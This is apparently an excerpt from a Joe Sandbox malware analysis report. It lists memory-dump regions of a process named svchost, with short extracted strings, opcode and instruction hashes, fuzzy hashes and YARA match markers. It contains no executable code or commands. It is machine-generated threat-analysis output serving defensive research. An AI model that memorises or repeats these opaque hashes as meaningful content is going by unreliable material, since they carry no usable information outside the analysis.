                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                  • API String ID: 0-2876891731
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .Local\$@
                                                                                                                  • API String ID: 0-380025441
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: MUI
                                                                                                                  • API String ID: 0-1339004836
                                                                                                                  • Opcode ID: f1c59133b1817cf9a0ab131decfb0dfea3b2faaa57a378348a6a973c3ed676e5
                                                                                                                  • Instruction ID: be00aaf97956b56916b1b5b7d97fe4a1571b43b83d24ab134b2731902e9abb81
                                                                                                                  • Opcode Fuzzy Hash: f1c59133b1817cf9a0ab131decfb0dfea3b2faaa57a378348a6a973c3ed676e5
                                                                                                                  • Instruction Fuzzy Hash: EF824C75E002189BDB24CFA9C984BEDF7B5BF4A710F188169D85AEB250DB319E41CF50
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: P`owRbow
                                                                                                                  • API String ID: 0-263301770
                                                                                                                  • Opcode ID: f849b347fc7dff7d1b9845de0d28806afb470cea834059b6b02d841b2ef43be9
                                                                                                                  • Instruction ID: 43bfe3ab7374075d124a78a173bce885670fe94b4cc2f55229a1b80659a2f7b6
                                                                                                                  • Opcode Fuzzy Hash: f849b347fc7dff7d1b9845de0d28806afb470cea834059b6b02d841b2ef43be9
                                                                                                                  • Instruction Fuzzy Hash: 8542E27DD04299AADF29FFA8D8446BDFBB0AF04B18F18905AD441EF280D7358B81CB54
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c8bca6361eead5c074511716da2787b4ceb36671cc67e447616df1921eac991a
                                                                                                                  • Instruction ID: 2d51b14a2c476683a68a3beda7dba8961bd2f3038d6c2c80109ac449adceef35
                                                                                                                  • Opcode Fuzzy Hash: c8bca6361eead5c074511716da2787b4ceb36671cc67e447616df1921eac991a
                                                                                                                  • Instruction Fuzzy Hash: D9A16BB5608342CFD724DF29C480A2ABBE5BF89704F19496EE585DB350E730E945CF92
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 0-4108050209
                                                                                                                  • Opcode ID: 72a7eaf7cc8e56cc8ed2abe6e1ee436b0abd1d9a8e75c0bcbb22e99e38ff597e
                                                                                                                  • Instruction ID: 85e08dfcb1a0fc284eb2cb806008690ce3c7f91c9dddbf95a7eb22085ec416ea
                                                                                                                  • Opcode Fuzzy Hash: 72a7eaf7cc8e56cc8ed2abe6e1ee436b0abd1d9a8e75c0bcbb22e99e38ff597e
                                                                                                                  • Instruction Fuzzy Hash: F1F1B0796087819FDB25CF25C484B6BBBE5AFC8750F09486DFC89CB240CB34DA858B55
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (
                                                                                                                  • API String ID: 0-3887548279
                                                                                                                  • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                  • Instruction ID: 3fe818a56d1c4c4c1cd7bbfb03c2513051827dc6881f052d851438b6f9677059
                                                                                                                  • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                  • Instruction Fuzzy Hash: A6021EB6E006189FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: PATH
                                                                                                                  • API String ID: 0-1036084923
                                                                                                                  • Opcode ID: 782b45dc364bbbac17c1424fe324914e2c8a6010b78bbe36d1c4c3525d564296
                                                                                                                  • Instruction ID: f63a8d3011b777662e3d77c456c32564c3cfe19375716406d70bf68f99a1593e
                                                                                                                  • Opcode Fuzzy Hash: 782b45dc364bbbac17c1424fe324914e2c8a6010b78bbe36d1c4c3525d564296
                                                                                                                  • Instruction Fuzzy Hash: F6F1D37AD00258DBCB25DFA9D880ABEBBB1FF9A700F494029E841EB350D775E941CB51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0db82049e943eed8f3afb27185a05683fe4bad9db05d5e5358d63aed22a0c05e
                                                                                                                  • Instruction ID: 9e5445505445a6e9497ff835554e335669c171fff8a67fe58c9d5e37b1dc8e54
                                                                                                                  • Opcode Fuzzy Hash: 0db82049e943eed8f3afb27185a05683fe4bad9db05d5e5358d63aed22a0c05e
                                                                                                                  • Instruction Fuzzy Hash: 6D4149B5D00288AFDB20DFA9D880AADFBF4FB58300F14416EE859EB211D7319A01DF60
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 0-3916222277
                                                                                                                  • Opcode ID: fbaf9936e9123821a492d56ca45ed1a1daace3bde71f0748d9804f1b1800625c
                                                                                                                  • Instruction ID: 912b5104630a4608ee12ec42806349a05d3a2cf8080956f54a22822f56e8015b
                                                                                                                  • Opcode Fuzzy Hash: fbaf9936e9123821a492d56ca45ed1a1daace3bde71f0748d9804f1b1800625c
                                                                                                                  • Instruction Fuzzy Hash: 61A10B33A043786BDF64DB298840BFEA7A95F46308F0940D9ED87EF281CA759B44CB55
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: GlobalTags
                                                                                                                  • API String ID: 0-1106856819
                                                                                                                  • Opcode ID: 4f3e426a6e092e9f6209aa5eb0ce3fc0d2c0af962f2ec626ba6c3c08e6782a70
                                                                                                                  • Instruction ID: 89f174274dab451a1fc6c813c47b92bd799d84f0eb91e9922cf15142aeef4ff4
                                                                                                                  • Opcode Fuzzy Hash: 4f3e426a6e092e9f6209aa5eb0ce3fc0d2c0af962f2ec626ba6c3c08e6782a70
                                                                                                                  • Instruction Fuzzy Hash: 0C716D76E0071ADFDF28CF9DD5906ADBBB5BF48708F18816AE806EB240E7309951CB54
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 0-2766056989
                                                                                                                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                  • Instruction ID: f49e858e14be0f8fd7364af565b33b151c54cc059969ad305024a28233406e22
                                                                                                                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                  • Instruction Fuzzy Hash: 90618D76D00219ABDF21DF99C844BEEFBB8FF81710F16456AE810EB290D7709A01DB91
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 0-2766056989
                                                                                                                  • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                  • Instruction ID: a799be4487b597a356811bf0ba8f747b44f04ad4c5533c96b073fa64e1a2fe85
                                                                                                                  • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                  • Instruction Fuzzy Hash: 24516672A04345AFD721DE54CC44FAAB7B8FB84750F05092DFA80DB290DBB5EA14CB92
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: EXT-
                                                                                                                  • API String ID: 0-1948896318
                                                                                                                  • Opcode ID: 0200ea529325244b393a737650f9485cba1dd6f3ab1f63c0ddf4fea734fc16e9
                                                                                                                  • Instruction ID: 4335949ac091f3bb2257cc2a482c11d74beba7f38266440c0ead934b456c19ab
                                                                                                                  • Opcode Fuzzy Hash: 0200ea529325244b393a737650f9485cba1dd6f3ab1f63c0ddf4fea734fc16e9
                                                                                                                  • Instruction Fuzzy Hash: F841B0765083519BD710DB75C984B6BB7E8BF88714F060E2DF984DB180EB74DA04C796
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: VUUU
                                                                                                                  • API String ID: 0-2040033107
                                                                                                                  • Opcode ID: aae79b698365045de7b712a1709c4bb73174b221727c3b144b45787120d9f0ba
                                                                                                                  • Instruction ID: f77cb7aa7326d82c03783e126e2f2ec5b482876dd80eec12db98c44f6d41fb92
                                                                                                                  • Opcode Fuzzy Hash: aae79b698365045de7b712a1709c4bb73174b221727c3b144b45787120d9f0ba
                                                                                                                  • Instruction Fuzzy Hash: 3D41C771B0010A07DB1C485DDDA06A66657C7E8399B5CC17FEE1AEF7E5E878AD028388
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: gfff
                                                                                                                  • API String ID: 0-1553575800
                                                                                                                  • Opcode ID: fbd406f5236462b4423dd9dfc36f178eded7f330d930c9420be446c12b7a2fd0
                                                                                                                  • Instruction ID: eca0d2927990a4488b5422bf74d63da1aff9b3d6c82c9f431e7a7205390c54f6
                                                                                                                  • Opcode Fuzzy Hash: fbd406f5236462b4423dd9dfc36f178eded7f330d930c9420be446c12b7a2fd0
                                                                                                                  • Instruction Fuzzy Hash: 12415C31B0455D47CB158D6DCD852E97B62EBD4304F5882BAD958EB3C0D5B89E0687C0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: gfff
                                                                                                                  • API String ID: 0-1553575800
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 54927d9dc4ad27ff5527c6dc0caa83e755990f2780f6c778783c7222936e7a85
                                                                                                                  • Instruction ID: 2fb3835cefedcf4f5160eb4aaa2ba4f99a794f9eaac93e729dd011a9e1c6e483
                                                                                                                  • Opcode Fuzzy Hash: 54927d9dc4ad27ff5527c6dc0caa83e755990f2780f6c778783c7222936e7a85
                                                                                                                  • Instruction Fuzzy Hash: D7F1E572E046118BCB18CFB9C9A077EFBF5EF98600719416AD4A6DB3C0D674EA41CB90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                  • Instruction ID: 301f0cab8a4d95ba33e47b9ec59fafbc0dd6ec4052c6a3bd7b89603ff8f4570c
                                                                                                                  • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                  • Instruction Fuzzy Hash: E6026E73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 05ad5870a95c0dec24100b27634f4e8665db5764e8f9d177e7894394216b9e57
                                                                                                                  • Instruction ID: 67742d581f7ca19ccbd65b9e80646d9f10d785d3794b6141b6bd11a4e304851f
                                                                                                                  • Opcode Fuzzy Hash: 05ad5870a95c0dec24100b27634f4e8665db5764e8f9d177e7894394216b9e57
                                                                                                                  • Instruction Fuzzy Hash: DEF1D677E006269BCB18CE68C5A06BDFBF5EF45610B1A426AD856EB3C0D734DE41CB90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 58e89fd9b27b4f16369ee6e9f8d42b6c93f2d583326aa24f2aa84c0c06bb0714
                                                                                                                  • Instruction ID: 4a3fa9e4b51e49539424323f0f4ef2be45b5a5e7a903ef397266288da4392617
                                                                                                                  • Opcode Fuzzy Hash: 58e89fd9b27b4f16369ee6e9f8d42b6c93f2d583326aa24f2aa84c0c06bb0714
                                                                                                                  • Instruction Fuzzy Hash: DBF1917490061ADFDB14DFA8C880BAEB7B5FF48308F1885A9E815DB345E734DA85CB90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 68632295a5e6b08fc4f35686167cbf91b5494f782c55964ed413408bc94fea54
                                                                                                                  • Instruction ID: a9ceee2fd36f8d5c220c0074a4cc8a1b4b06f0ee7f88a381e489b7d4631cc9e9
                                                                                                                  • Opcode Fuzzy Hash: 68632295a5e6b08fc4f35686167cbf91b5494f782c55964ed413408bc94fea54
                                                                                                                  • Instruction Fuzzy Hash: 4CD1C475A007269BCF14EF65C890ABABBB5BF44708F094629F915DF280EB34EA45CB50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dcf7e154ba3d11db12221a79477c9d077c09de4965553be051bdbd2eb90796dd
                                                                                                                  • Instruction ID: 2a4a86ed1cb7e697710a7a7c0f4162716b8915deaaea04eeb9b21f1541bace45
                                                                                                                  • Opcode Fuzzy Hash: dcf7e154ba3d11db12221a79477c9d077c09de4965553be051bdbd2eb90796dd
                                                                                                                  • Instruction Fuzzy Hash: 29D14C72E043198BDF28CA99C5843BDBBB5FB54344F19C06AE842EB695D7748AC1CB48
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e7952a73fcb0c06d3ae1428ad145019e6c7a3ac904cd06d2ef93a2566d25f672
                                                                                                                  • Instruction ID: ea38034448a7249a0b47cf1357cf7215789ae1e2ddaf55fdfb4c685866b0bcfa
                                                                                                                  • Opcode Fuzzy Hash: e7952a73fcb0c06d3ae1428ad145019e6c7a3ac904cd06d2ef93a2566d25f672
                                                                                                                  • Instruction Fuzzy Hash: 0AE17D75A002458FDB18CF59C884BAAF7F5FF98310F19819AE855EB391D730EA51CB90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 47f9d116f930cc40313cfd420fff7415493c598fc89b5355c3ebff360374c387
                                                                                                                  • Instruction ID: d9ab39af31f9c792273f977cd750dcd40d7268fb34ea03c6cb8938fe6e8f5535
                                                                                                                  • Opcode Fuzzy Hash: 47f9d116f930cc40313cfd420fff7415493c598fc89b5355c3ebff360374c387
                                                                                                                  • Instruction Fuzzy Hash: F7D1C431B003198FDB34EB25C898BAAF7B5BB45314F0940E9D90ADB242DB75AE85CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a3124092b18c1185750ccf5bbf40d3549ab01253326b6e7db0c49f220eadbd46
                                                                                                                  • Instruction ID: 36cf4d49f2b9f0404de4cfe390480388e7d6d5a2803ddabd13e8a08a00aa0104
                                                                                                                  • Opcode Fuzzy Hash: a3124092b18c1185750ccf5bbf40d3549ab01253326b6e7db0c49f220eadbd46
                                                                                                                  • Instruction Fuzzy Hash: BBC1A571E002169BEF18CF5AC848BAEF7B5EF55314F198269D815EB280D771EA42CB81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                  • Instruction ID: 0f259f5ac383e79320f5477814559ae95be2d4b5d80856cf2eb3fde404c9d76d
                                                                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                  • Instruction Fuzzy Hash: 5BB12535600655AFEF25DB69C844BBEFBF6EF84200F1A0199D642DF281DB30EA41DB90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f92fbd45898c2da03748067d30bf3191a3e44c87833c750e9acb7d61e9cbd0a4
                                                                                                                  • Instruction ID: 23f397a18733344356864ad61c056dc7f10c4437d0abb20fb2d6b52ec3e86710
                                                                                                                  • Opcode Fuzzy Hash: f92fbd45898c2da03748067d30bf3191a3e44c87833c750e9acb7d61e9cbd0a4
                                                                                                                  • Instruction Fuzzy Hash: 32A16A75900205AFEB12EFA4CC49FAE77B9AF45750F060094F901EF2A0D775AD50DBA4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d4aba702a05b78d9ca217e2124169597e92c1977c8e2086359d66209299cb692
                                                                                                                  • Instruction ID: 62cb4eb96a79b102cad59048c22df6155458c89986f8e7f3f7ade8214e11a4d3
                                                                                                                  • Opcode Fuzzy Hash: d4aba702a05b78d9ca217e2124169597e92c1977c8e2086359d66209299cb692
                                                                                                                  • Instruction Fuzzy Hash: 68C169741083418FEB64CF15C495BAAB7E4FF88704F49496EE989CB290D774EA08CF92
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c968b0e4dd8eab9e6e16fce3eb331ef7f573e6de141b791e9f311a0e7e6852fd
                                                                                                                  • Instruction ID: 3bf16fdc07a13450a0073aa4b36b2845eb358b136bba97ba829e7be4bddeb119
                                                                                                                  • Opcode Fuzzy Hash: c968b0e4dd8eab9e6e16fce3eb331ef7f573e6de141b791e9f311a0e7e6852fd
                                                                                                                  • Instruction Fuzzy Hash: A8A1C175A0072ADBDB24DF6AC991BAAB7F5FF44318F044129EE05DB281DB34E901DB50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 40faecd83f0643dfe04d81da684b845ea0da2725f9d89854bf38603903f914d7
                                                                                                                  • Instruction ID: ffce50bc57664964dd1f114cd67254298e06f74f0dee9c3d5f080b6400e3ded6
                                                                                                                  • Opcode Fuzzy Hash: 40faecd83f0643dfe04d81da684b845ea0da2725f9d89854bf38603903f914d7
                                                                                                                  • Instruction Fuzzy Hash: 1A910436A007258BEB24EB79D448B7EB7A5FF84714F0B40AAE805DF240EB34DA41C791
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e5ccda8bb4b9bdc01734c0f3ac518810ecf0a3f6867367ee81e77842bac9d5b9
• Instruction ID: 3ca5ff5da37b684c5d074b7dfdd7ecc99c164f23ba3613204f6b28b82d1f8048
• Opcode Fuzzy Hash: e5ccda8bb4b9bdc01734c0f3ac518810ecf0a3f6867367ee81e77842bac9d5b9
• Instruction Fuzzy Hash: FEB10275A093408FD354DF28C580A5AFBF1BB89304F184A6EF899DB351D371EA45CB52
Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
• Instruction ID: efd3e8be87051e0fd9e9441e3d5e9dbe69e9fdfdf7e403425c2bfb53e152fa67
• Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
• Instruction Fuzzy Hash: 48817A36E047D68FDB29CEAEC8D02ADFB55EF56204B2C467AD542CF241C225D986C391
Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
• Instruction ID: d1b85583018ec38e75dc2f59bb9a0644196fe3bc11a8fcc41409d20e9a8cd483
• Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
• Instruction Fuzzy Hash: BA915372620A06CFD725CF2DC889662BBE0FF55364F188A18E8E7DB6A0C375E511CB10
Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
